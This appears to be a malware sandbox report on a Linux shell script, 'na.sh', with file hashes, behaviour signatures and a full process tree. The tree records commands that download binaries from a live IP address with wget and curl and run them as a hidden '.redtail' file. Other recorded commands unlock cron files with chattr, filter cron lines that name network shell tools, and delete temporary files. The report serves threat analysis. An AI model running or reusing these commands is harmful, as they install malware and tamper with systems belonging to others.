Analysis
-
max time kernel
56s -
max time network
58s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
12-10-2024 06:23
Static task
static1
Behavioral task
behavioral1
Sample
na.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
na.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
na.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
na.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
na.sh
-
Size
1KB
-
MD5
178c9bea5410e5116df6a89c32ed3e3e
-
SHA1
49e63c7cea087a414ee03be92153842f39214155
-
SHA256
f18e352338ba21f9da7541c0025cc4c8a8febdebbe0bf057478ee3ce691571c8
-
SHA512
db921274de9a5d2d04531503e1dfc80fb8f87d1913cffa05737a6317bd812d9afb598e8dfcd25db2af9534c15e47d092695c69a50fd35e6d86fd13ef113c330e
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 868 chmod 875 chmod 904 chmod 769 chmod 857 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /.redtail 859 .redtail /.redtail 869 .redtail /.redtail 876 .redtail /.redtail 906 .redtail -
Attempts to change immutable files 22 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 814 chattr 782 chattr 783 chattr 793 chattr 812 chattr 803 grep 806 chattr 810 chattr 816 grep 785 grep 790 grep 795 grep 799 grep 802 chattr 808 grep 815 chattr 777 chattr 784 chattr 789 chattr 797 chattr 776 chattr 778 grep -
resource yara_rule behavioral4/files/fstream-18.dat upx behavioral4/files/fstream-20.dat upx behavioral4/files/fstream-24.dat upx -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/mounts cat File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems mv File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems find File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/clean_crontab sh
Processes
-
/tmp/na.sh/tmp/na.sh1⤵PID:714
-
/usr/bin/awkawk "{print \$2}"2⤵
- Reads runtime system information
PID:721
-
-
/bin/grepgrep noexec2⤵PID:720
-
-
/bin/catcat /proc/mounts2⤵
- Reads runtime system information
PID:719
-
-
/usr/bin/whoamiwhoami2⤵PID:729
-
-
/usr/bin/findfind / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*"2⤵
- Reads runtime system information
PID:731
-
-
/bin/unameuname -mp2⤵PID:758
-
-
/usr/bin/touchtouch .testfile2⤵PID:759
-
-
/bin/dddd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"2⤵PID:761
-
-
/bin/rmrm -rf .testfile .testfile22⤵PID:764
-
-
/usr/bin/wgetwget http://154.216.17.30/clean2⤵PID:765
-
-
/bin/chmodchmod +x clean2⤵
- File and Directory Permissions Modification
PID:769
-
-
/bin/shsh clean2⤵
- Writes file to tmp directory
PID:770 -
/bin/systemctlsystemctl disable c3pool_miner3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:772
-
-
/bin/systemctlsystemctl stop c3pool_miner3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:774
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/crontabs3⤵
- Attempts to change immutable files
PID:776
-
-
/usr/bin/chattrchattr -ia /etc/crontab3⤵
- Attempts to change immutable files
PID:777
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab3⤵
- Attempts to change immutable files
PID:778
-
-
/bin/mvmv /tmp/clean_crontab /etc/crontab3⤵
- Reads runtime system information
PID:780
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly3⤵
- Attempts to change immutable files
PID:782
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily3⤵
- Attempts to change immutable files
PID:783
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/apt-compat3⤵
- Attempts to change immutable files
PID:784
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat3⤵
- Attempts to change immutable files
PID:785
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/apt-compat3⤵
- Reads runtime system information
PID:787
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/bsdmainutils3⤵
- Attempts to change immutable files
PID:789
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils3⤵
- Attempts to change immutable files
PID:790
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/bsdmainutils3⤵
- Reads runtime system information
PID:791
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/dpkg3⤵
- Attempts to change immutable files
PID:793
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg3⤵
- Attempts to change immutable files
PID:795
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/dpkg3⤵
- Reads runtime system information
PID:796
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/exim4-base3⤵
- Attempts to change immutable files
PID:797
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base3⤵
- Attempts to change immutable files
PID:799
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/exim4-base3⤵
- Reads runtime system information
PID:801
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/logrotate3⤵
- Attempts to change immutable files
PID:802
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate3⤵
- Attempts to change immutable files
PID:803
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/logrotate3⤵
- Reads runtime system information
PID:805
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/passwd3⤵
- Attempts to change immutable files
PID:806
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd3⤵
- Attempts to change immutable files
PID:808
-
-
/bin/mvmv /tmp/clean_crontab /etc/cron.daily/passwd3⤵
- Reads runtime system information
PID:809
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly3⤵
- Attempts to change immutable files
PID:810
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly3⤵
- Attempts to change immutable files
PID:812
-
-
/usr/bin/chattrchattr -ia /etc/cron.d3⤵
- Attempts to change immutable files
PID:814
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab3⤵
- Attempts to change immutable files
PID:815
-
-
/bin/grepgrep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab3⤵
- Attempts to change immutable files
PID:816
-
-
/bin/mvmv /tmp/clean_crontab /etc/anacrontab3⤵
- Reads runtime system information
PID:818
-
-
/bin/rmrm -rf /tmp/na.sh3⤵PID:820
-
-
/bin/rmrm -rf "/var/tmp/*"3⤵PID:821
-
-
/bin/rmrm -rf "/dev/shm/*"3⤵PID:822
-
-
-
/bin/rmrm -rf clean2⤵PID:823
-
-
/bin/rmrm -rf .redtail2⤵PID:825
-
-
/bin/grepgrep -q x86_642⤵PID:828
-
-
/bin/grepgrep -q amd642⤵PID:830
-
-
/bin/grepgrep -q "i[3456]86"2⤵PID:832
-
-
/bin/grepgrep -q armv82⤵PID:835
-
-
/bin/grepgrep -q aarch642⤵PID:838
-
-
/bin/grepgrep -q armv72⤵PID:840
-
-
/usr/bin/wgetwget http://154.216.17.30/x86_642⤵PID:842
-
-
/bin/catcat x86_642⤵PID:856
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:857
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm -rf x86_642⤵PID:862
-
-
/usr/bin/wgetwget http://154.216.17.30/i6862⤵PID:864
-
-
/bin/catcat i6862⤵PID:867
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:868
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm -rf i6862⤵PID:871
-
-
/usr/bin/wgetwget http://154.216.17.30/arm82⤵PID:872
-
-
/usr/bin/curlcurl -O http://154.216.17.30/arm82⤵
- Reads runtime system information
PID:873
-
-
/bin/catcat arm82⤵PID:874
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:875
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm -rf arm82⤵PID:877
-
-
/usr/bin/wgetwget http://154.216.17.30/arm72⤵PID:878
-
-
/bin/catcat arm72⤵PID:903
-
-
/bin/chmodchmod +x .redtail2⤵
- File and Directory Permissions Modification
PID:904
-
-
/.redtail./.redtail2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm -rf arm72⤵PID:909
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5b2d1236c286a3c0704224fe4105eca49
SHA17d76d48d64d7ac5411d714a4bb83f37e3e5b8df6
SHA2565647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee
SHA512731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6
-
Filesize
1.1MB
MD5c453c0bed34360586bcb04a1b9b903c5
SHA17189049a66b1ff32cfd3dae28727c21680eb2e34
SHA256c1aad34e379fb2f7658756025dee4c6e3d7abe7ed6b46834d03cec155776dc42
SHA512674f783176a8a9254755c48bc72bc959f538b36dd1e40cb7960b66c73f4e4659b5657c716b25183a2855a42a4d0006129cd77d74c499d8481b27a811016cd66a
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
795B
MD5397ff5e54194072e6d8a44a0d8cc1b27
SHA142477b0c3b277b5e907b0a35c644f3291ed30a63
SHA256d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e
SHA512ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74
-
Filesize
1.6MB
MD5ee125336e3ad079ed14d40d1e9085b69
SHA15be3757d0ccf5cd311174e8792d79001522cc5ad
SHA25609c3204915b877a36938809593eb66672ff46173afc01f309c62cbd948b25bac
SHA512c5a8432b3c826d73aef4f47f08088ba1a3443e1241981c8106fe452694046cab49e46b6e90b2dc22f319bf05cee95a1134f50bb3603c10c6b46b9011dca31a8c
-
Filesize
1KB
MD530e858769aacd9cc309502f8d5c6aa0f
SHA1927c06dd4d6cbb5ca02e9505011c8667c47f2d6e
SHA256eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd
SHA512f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c
-
Filesize
3KB
MD502f33c9e59b27bcd241e488cd48de072
SHA19247eee9b2310d56455beccf41c577ba16b78e3d
SHA2562565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14
SHA5121eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d
-
Filesize
249B
MD5db990990933b6f56322725223f13c2bc
SHA1387303696a796e27f559c73679e979f2a538072d
SHA256777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1
SHA512a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5
-
Filesize
722B
MD58f111d100ea459f68d333d63a8ef2205
SHA1077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA2560e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb
-
Filesize
1KB
MD5bc4a71cbcaeed4179f25d798257fa980
SHA161445721d0b5d86ac0a8386a4ceef450118f4fbb
SHA2568eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767
SHA512709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c
-
Filesize
279B
MD5911a774fe040993b929504f3d9415ab3
SHA155ccc8e95097f005abf9f4d91a14394e6d0f5da5
SHA256340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d
SHA5121eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f
-
Filesize
1.6MB
MD5d13d24b429d2689336f191e389d160f5
SHA19ec54faeffd467e7986f74ad40abe61b0a497706
SHA2565c8724d9938418ac2cddf71445d78b8b38bf55af2df51a4162912a9a12736547
SHA5123b5bb99a65dc10ab8d7068b57f80c9fd3695d9e4c377759c0760759bc4c74d04e7c6068cb51dd86ea89f6f4c2407ddfa37cc221145023f0feeaf59dfc46171ea